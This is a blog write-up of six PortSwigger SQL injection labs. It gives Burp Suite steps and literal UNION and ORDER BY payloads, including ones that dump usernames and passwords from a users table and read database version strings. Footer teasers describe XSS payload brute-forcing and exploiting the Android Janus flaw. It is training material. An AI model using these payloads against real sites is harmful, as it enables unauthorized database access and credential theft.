SQL Injection Attacks | Shahul Hameed

Lab 1: SQL injection UNION attack, determining the number of columns returned by the query

Introduction

    This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.

    To solve the lab, determine the number of columns returned by the query by performing an SQL injection UNION attack that returns an additional row containing null values.

Solutions:

  1. Use Burp Suite to intercept and modify the request that sets the product category filter.
  2. Modify the category parameter, giving it the value '+UNION+SELECT+NULL--. Observe that an error occurs.
  3. Modify the category parameter to add an additional column containing a null value: '+UNION+SELECT+NULL,NULL--
  4. Continue adding null values until the error disappears and the response includes additional content containing the null values.
Step 1: UI view



Step 2: Check whether the application is vulnerable or not before executing any payload into an application.

    Inject: ' or " end of the query in URL

Step 3: Type 1: Attack method through by UNION method

    Iterative add the NULL at the end of the query until getting status OK 200
    
        Note: CTRL + U to encode URL in burp suite

    Payload: query?category=Gifts'+UNION+select+NULL,+NULL,+NULL--

Step 4: Intercept application URL into Burp Suite.


Type 2: Attack through by ORDER BY method

Step 1: Iterative order by the value at the end of the query until getting status OK 200

      Note: CTRL + U to encode URL in burp suite

    Payload: query?category=Gifts'+ORDER+BY+3--     



    Note: If exceed the order value shown error hence we can understand exact columns in the table.



Lab 2: SQL injection UNION attack, finding a column containing text

Introduction

    This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.

    The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform an SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

Solution:

  1. Use Burp Suite to intercept and modify the request that sets the product category filter.
  2. Determine the number of columns that are being returned by the query. Verify that the query is returning three columns, using the following payload in the category parameter: '+UNION+SELECT+NULL,NULL,NULL--
  3. Try replacing each null with the random value provided by the lab, for example: '+UNION+SELECT+'abcdef',NULL,NULL--
  4. If an error occurs, move on to the next null and try that instead.
Step 1: UI View


Step 2: Intercept application URL into Burp Suite.
    
    Note: Find the exact columns in the table using the iterative UNION NULL technique.

Payload: '+UNION+SELECT+NULL,NULL,NULL--



Step 3: Inject the given text in the lab into query.

    Payload: query? category=Gifts'+UNION+select+NULL,'XpoIxr',+NULL--



Lab 3: SQL injection UNION attack, retrieving data from other tables

Introduction

    This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.

    The database contains a different table called users, with columns called username and password.

    To solve the lab, perform an SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user. 

Solution

  1. Use Burp Suite to intercept and modify the request that sets the product category filter.
  2. Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter: '+UNION+SELECT+'abc','def'--.
  3. Use the following payload to retrieve the contents of the users table: '+UNION+SELECT+username,+password+FROM+users--
  4. Verify that the application's response contains usernames and passwords. 
Step 1: UI view


Step 2: Intercept application URL into Burp Suite.
    
    Note: Find the exact columns in the table using the iterative UNION NULL technique.


Step 3: Now replace the NULL value with correspondent users table column value and retrieve the user's table data.

Payload: '+UNION+SELECT+username,+password+FROM+users--



Step 4: Enter the exposed credentials into the application.


Lab 4: SQL injection UNION attack, retrieving multiple values in a single column 

Introduction

    This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

    The database contains a different table called users, with columns called username and password

    To solve the lab, perform an SQL injection UNION attack that retrieves all usernames and password, and use the information to log in as the administrator user.


Solutions

  1. Use Burp Suite to intercept and modify the request that sets the product category filter.
  2. Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, only one of which contain text, using a payload like the following in the category parameter: '+UNION+SELECT+NULL,'abc'--
  3. Use the following payload to retrieve the contents of the users table: '+UNION+SELECT+NULL,username||'~'||password+FROM+users--
  4. Verify that the application's response contains usernames and passwords.
Step 1: UI view

Step 2: Intercept application URL into Burp Suite.
    
    Note: Find the exact columns in the table using the iterative UNION NULL technique.

Payload: 
GET /filter?category=Accessories'+UNION+select+NULL,+username+||+'*'+||password+from+users--


Step 3:Enter the exposed credentials into the application.

Lab 5: SQL injection attack, querying the database type and version on Oracle

Introduction

    This lab contains an SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

    To solve the lab, display the database version string.

Solution

  1. Use Burp Suite to intercept and modify the request that sets the product category filter.
  2. Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter: '+UNION+SELECT+'abc','def'+FROM+dual--
  3. Use the following payload to display the database version: '+UNION+SELECT+BANNER,+NULL+FROM+v$versio--
Reference URL : 

https://portswigger.net/web-security/sql-injection/cheat-sheet

Step 1: Intercept the UI in the burp suite application.

            Find the number of columns using the ORDER BY statement.

    Payload: GET /filter?category=Accessories'+ORDER+BY+2+-- HTTP/1.1


Step 2: Find the datatype of columns in the table.

    Oracle database: SELECT Statement

    Payload: GET /filter?category=Accessories'+UNION+SELECT+'a',+'a'+FROM+DUAL--


Step 3: Get the version of the database.

    Oracle database: SELECT Version statement

    Payload: 

    GET /filter?category=Accessories'+UNION+SELECT+banner,+NULL+FROM+v$version--

Lab 6: SQL injection attack, querying the database type and version on MySQL and Microsoft

Introduction

    This lab contains an SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

    To solve the lab, display the database version string.

Solution

  1. Use Burp Suite to intercept and modify the request that sets the product category filter.
  2. Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter: '+UNION+SELECT+'abc','def'#
  3. Use the following payload to display the database version: '+UNION+SELECT+@@version,+NULL#

Step 1: Intercept the UI in the burp suite application.

            Find the number of columns using the ORDER BY statement.

            Note: Here comment using (#) instead of (--)

    Payload: GET /filter?category=Accessories'+ORDER+BY+2# HTTP/1.1  => OK Status 200

Step 2: Find the version of the database.
    Note: Check all the types versions of databases in cheatsheet Portswigger.
    Payload: GET /filter?category=Accessories'UNION+SELECT+@@version,+NULL# 






























Comments

Post a Comment

Popular posts from this blog

Using Burp Suite - Brute Force payloads using XSS Validator(Extension) | Shahul Hameed

Image
XSS Brute Force Payloads using Burp Suite  Step 1: Get the parameter variable from the scope URL. Step 2: Intercept the parameter value using the burp suite application as shown in the below screenshot. Step 3: Clear and add the variable position which goes to perform an attack on the brute force of XSS payloads. Step 4: Install xssValidator extension in the burp suite and we can also add custom payloads in the below payloads box. Step 5: Set the following options in the Payloads option. Step 6: In Intruder clear, the Grep-Match and Grep-Payloads checked option search responses for payload strings. Step 7: Copy the grep phase from xssValidator and paste it into the intruder grep-match. Step 8: Unchecked the option from the payload encoding. Step 9: Start the attack and check the results with the grep value is 1 manually in the web browser which exploited the XSS attack payload.
Read more

Janus Vulnerability Exploitation

Image
  Janus Vulnerability(Exploitation) In brief, Applications that are signed only with v1 when installed on devices having an android version(5.0–8.0) are vulnerable to Janus Vulnerability. Step 1: Use the  apksigner tool and verify the signature v1 is only true , Hence it's highly possible to exploit the Janus vulnerability in the android application. CMD: apksigner verify -verbose h5.apk(Victim app) Before that we need to make sure that this application can be made to run on vulnerable Android versions  5.x, 6.x, 7.x & 8.0 (i.e., api level 21–26). Step 2:  Now let's check with min android version running on the application use apktool . CMD: apktool -s d H5.apk && cat H5/apktool.yml | grep minSdk The below application can be run on API Level 15(Android 4.0.4 Ice Cream Sandwich), so we can choose any device from  5.x, 6.x, 7.x & 8.0  to exploit it. A serious vulnerability in Android allows attackers to inject a DEX file into an APK file without affecting the sig
Read more

SQL Basics | Shahul Hameed

Image
  SQL _Queries   Resource: https://balanced-quince-db1.notion.site/SQL-7347f5956fe347f887b4132c716cd236#17bc403a1add453db519621da47c1de3 Database queries CREATE DATABASE LOGICFIRST; -- creates a new database -- TO DELETE A DATABASE DROP DATABASE LOGICFIRST; DROP SCHEMA LOGICFIRST; -- same as above. u can use DATABASE Or SCHEMA DROP SCHEMA IF EXISTS LOGICFIRST; -- prevents error if db not found   SHOW DATABASES; -- shows all the databases SHOW SCHEMAS; -- same as above. shows schemas/db   USE SYS; -- uses this database for all further commands SHOW TABLES;-- shows all tables in the database being used Table - Create,Delete,Alter primary key - uniquely identifies a row in a table //creating a table CREATE TABLE student(                id INT PRIMARY KEY,     name VARCHAR(30),     gpa DECIMAL(3,2) ); -- ----or----- CREATE TABLE student(                id INT,     name VARCHAR(30),     gpa DECIMAL(3,2),     PRIMARY KEY(id) );  
Read more